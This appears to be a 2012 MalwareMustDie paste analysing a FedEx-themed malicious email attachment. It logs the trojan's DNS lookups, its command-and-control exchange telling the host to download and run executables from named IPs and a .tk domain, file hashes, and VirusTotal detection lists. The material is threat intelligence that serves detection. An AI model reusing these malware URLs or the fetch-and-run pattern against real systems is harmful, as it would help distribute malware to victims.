SHARE
TWEET

#MMD FedEX(mail attachment - Label_Fedex_Print_document.zip)

MalwareMustDie Oct 20th, 2012 170 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. DNS:
  2. 108.236.160.217.in-addr.arpa: type PTR, class IN, s15383432.domainepardefaut.fr
  3. sryfa.jvuydaas.tk: type A, class IN, addr 85.17.58.87
  4.  
  5. GET /2c21509821B51FE8A635B27547A4C6EE32F1AFC945611FBC3C2432BDDB871111DBC6B42D3E54F31FC40EC842203F406DC2DF061FFAD958364B3386EAD222A5E122F71DA508A105B2FF32 HTTP/1.0
  6. User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  7. Host: 217.160.236.108:84
  8.  
  9. HTTP/1.1 200 OK
  10. Server: nginx/1.2.3
  11. Date: Tue, 16 Oct 2012 19:17:59 GMT
  12. Content-Type: text/html
  13. Content-Length: 49
  14. Connection: close
  15. X-Powered-By: PHP/5.4.4-7
  16. Vary: Accept-Encoding
  17.  
  18. c=run&u=/get/faa91cf5e79a76602f094ed38fad5872.exe
  19.  
  20. GET //get/faa91cf5e79a76602f094ed38fad5872.exe HTTP/1.0
  21. Accept: */*
  22. Proxy-Connection: Keep-Alive
  23. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  24. Host: 217.160.236.108:84
  25.  
  26. HTTP/1.1 200 OK
  27. Server: nginx/1.2.3
  28. Date: Tue, 16 Oct 2012 19:17:59 GMT
  29. Content-Type: application/x-msdos-program
  30. Content-Length: 468480
  31. Connection: close
  32. Last-Modified: Tue, 16 Oct 2012 19:00:04 GMT
  33. ETag: "ddc101-72600-4cc31c3021500"
  34. Accept-Ranges: bytes
  35.  
  36. MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
  37.  
  38. GET /api/urls/?ts=b261bdc2&affid=70300 HTTP/1.1
  39. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  40. Host: 175.41.28.156
  41. Connection: Keep-Alive
  42. Cache-Control: no-cache
  43. Pragma: no-cache
  44.  
  45. HTTP/1.1 200 OK
  46. Server: nginx/0.8.55
  47. Date: Tue, 16 Oct 2012 19:19:41 GMT
  48. Content-Type: text/html; charset=utf-8
  49. Transfer-Encoding: chunked
  50. Connection: keep-alive
  51.  
  52. http://sryfa.jvuydaas.tk/update.1.0.exe?ts=b261bdc2&affid=70300
  53.  
  54. GET /update.1.0.exe?ts=b261bdc2&affid=7030 HTTP/1.1
  55. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  56. Host: sryfa.jvuydaas.tk
  57. Connection: Keep-Alive
  58. Cache-Control: no-cache
  59. Pragma: no-cache
  60.  
  61. HTTP/1.1 200 OK
  62. Date: Tue, 16 Oct 2012 17:16:41 GMT
  63. Server: Apache/2.2.3 (CentOS)
  64. Last-Modified: Mon, 15 Oct 2012 07:07:10 GMT
  65. ETag: "13c810e-32000-afa34380"
  66. Accept-Ranges: bytes
  67. Content-Length: 204800
  68. Connection: close
  69. Content-Type: application/octet-stream
  70.  
  71. MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
  72.  
  73. GET /api/stats/install/?ts=b261bdc2&affid=70300&ver=3070010&group=srs HTTP/1.1
  74. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  75. Host: 175.41.28.156
  76. Connection: Keep-Alive
  77. Cache-Control: no-cache
  78. Pragma: no-cache
  79.  
  80. HTTP/1.1 200 OK
  81. Server: nginx/0.8.55
  82. Date: Tue, 16 Oct 2012 19:21:44 GMT
  83. Content-Type: text/html; charset=utf-8
  84. Connection: keep-alive
  85. Content-Length: 0
  86.  
  87. $ md5sum.exe 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  88. 2c487ba4f99e1a712214977fd1b1529b *1.bin
  89. 57d9b0652f253933df251624b3965c52 *Label_Fedex_Print_document.exe
  90. 837725339650aac6625fa4a05e0e96e1 *4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  91.  
  92. $ ls -l 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  93. ----------+ 1 Tom None 204800 Oct 16 22:23 1.bin
  94. ----------+ 1 Tom None 468480 Oct 16 21:19 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  95. ----------+ 1 Tom None  53760 Oct 16 00:53 Label_Fedex_Print_document.exe
  96.  
  97.  
  98. https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/
  99.  
  100. SHA256:         0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
  101. SHA1:   8ed84aca99321ca2257822bfd8814b87e89aaa27
  102. MD5:    57d9b0652f253933df251624b3965c52
  103. File size:      52.5 KB ( 53760 bytes )
  104. File name:      1350392715.Label_Fedex_Print_document.exe
  105. File type:      Win32 EXE
  106. Tags:   peexe bobsoft
  107. Detection ratio:        10 / 43
  108. Analysis date:  2012-10-16 13:03:27 UTC ( 7 hours, 30 minutes ago )
  109.  
  110. Avast   Win32:Trojan-gen        20121016
  111. ESET-NOD32      a variant of Win32/Injector.XTQ         20121016
  112. Ikarus  Trojan.Win32.FakeAV     20121016
  113. Kaspersky       HEUR:Trojan.Win32.Generic       20121016
  114. Kingsoft        Win32.Troj.Undef.(kcloud)       20121008
  115. Norman  W32/Kryptik.BVX         20121016
  116. Sophos  Troj/Agent-YGO  20121016
  117. Symantec        Trojan.Fakeavlock       20121016
  118. TrendMicro      BKDR_ANDROM.AR  20121016
  119. TrendMicro-HouseCall    BKDR_ANDROM.AR  20121016
  120.  
  121. https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/1350419657/
  122.  
  123. SHA256:         0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
  124. SHA1:   8ed84aca99321ca2257822bfd8814b87e89aaa27
  125. MD5:    57d9b0652f253933df251624b3965c52
  126. File size:      52.5 KB ( 53760 bytes )
  127. File name:      Label_Fedex_Print_document.exe
  128. File type:      Win32 EXE
  129. Detection ratio:        19 / 43
  130. Analysis date:  2012-10-16 20:34:17 UTC ( 0 minutes ago )
  131.  
  132. AntiVir         TR/Oficla.llooima       20121016
  133. Avast   Win32:Trojan-gen        20121016
  134. Commtouch       W32/Trojan3.EDK         20121016
  135. ESET-NOD32      a variant of Win32/Injector.XTQ         20121016
  136. F-Prot  W32/Trojan3.EDK         20121016
  137. Fortinet        W32/Agent.YGO!tr        20121016
  138. Ikarus  Trojan.Win32.FakeAV     20121016
  139. Kaspersky       HEUR:Trojan.Win32.Generic       20121016
  140. Kingsoft        Win32.Troj.Undef.(kcloud)       20121008
  141. McAfee  Generic.tfr!cp  20121016
  142. Microsoft       TrojanDownloader:Win32/Kuluoz.B         20121016
  143. MicroWorld-eScan        Gen:Variant.Symmi.3147  20121016
  144. Norman  W32/Kryptik.BVX         20121016
  145. Panda   Suspicious file         20121016
  146. PCTools         Trojan.Fakeavlock       20121016
  147. Sophos  Troj/Agent-YGO  20121016
  148. Symantec        Trojan.Fakeavlock       20121016
  149. TrendMicro      BKDR_ANDROM.AR  20121016
  150. TrendMicro-HouseCall    BKDR_ANDROM.AR  20121016
  151.  
  152.  
  153. https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/
  154.  
  155. SHA256:         a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
  156. SHA1:   cdc423285c40b9dcb752bbf23e96afd5a93a26ee
  157. MD5:    2c487ba4f99e1a712214977fd1b1529b
  158. File size:      200.0 KB ( 204800 bytes )
  159. File name:      update.1.0.exe
  160. File type:      Win32 EXE
  161. Tags:   peexe
  162. Detection ratio:        3 / 43
  163. Analysis date:  2012-10-16 20:35:27 UTC ( 2 minutes ago )
  164.  
  165. Fortinet        W32/Krypt.ABK!tr        20121016
  166. Kaspersky       Backdoor.Win32.Papras.fts       20121016
  167. TrendMicro-HouseCall    TROJ_GEN.RC1H1JG        20121016
  168.  
  169. https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/1350419889/
  170.  
  171. SHA256:         a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
  172. SHA1:   cdc423285c40b9dcb752bbf23e96afd5a93a26ee
  173. MD5:    2c487ba4f99e1a712214977fd1b1529b
  174. File size:      200.0 KB ( 204800 bytes )
  175. File name:      1.bin
  176. File type:      Win32 EXE
  177. Detection ratio:        3 / 43
  178. Analysis date:  2012-10-16 20:38:09 UTC ( 0 minutes ago )
  179.  
  180. Fortinet        W32/Krypt.ABK!tr        20121016
  181. Kaspersky       Backdoor.Win32.Papras.fts       20121016
  182. TrendMicro-HouseCall    TROJ_GEN.RC1H1JG        20121016
  183.  
  184. First seen by VirusTotal
  185. 2012-10-16 15:28:54 UTC ( 5 hours, 13 minutes ago )
  186.  
  187. Last seen by VirusTotal
  188. 2012-10-16 20:39:33 UTC ( 2 minutes ago )
  189.  
  190. File names (max. 25)
  191.     1.bin
  192.     update.1.0.exe
  193.     DRWEB32.EXE
  194.     DRWEB
  195.  
  196.  
  197. https://www.virustotal.com/file/63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6/analysis/1350419889/
  198.  
  199. SHA256:         63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6
  200. SHA1:   731d256bffe4280a6c13e66b85454d01134d75ee
  201. MD5:    837725339650aac6625fa4a05e0e96e1
  202. File size:      457.5 KB ( 468480 bytes )
  203. File name:      4D726CFC1DE95098002C4D7240DAA130.exe
  204. File type:      Win32 EXE
  205. Detection ratio:        7 / 43
  206. Analysis date:  2012-10-16 20:38:09 UTC ( 0 minutes ago )
  207.  
  208. DrWeb   Trojan.Fakealert.34171  20121016
  209. ESET-NOD32      Win32/Adware.SystemSecurity.AL  20121016
  210. Fortinet        W32/FakeAV.NTP!tr       20121016
  211. Kaspersky       UDS:DangerousObject.Multi.Generic       20121016
  212. McAfee  FakeAlert-SecurityTool.fo       20121016
  213. MicroWorld-eScan        Gen:Variant.Strictor.8753       20121016
  214. Norman  W32/FakeAV.BJTK         20121016
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top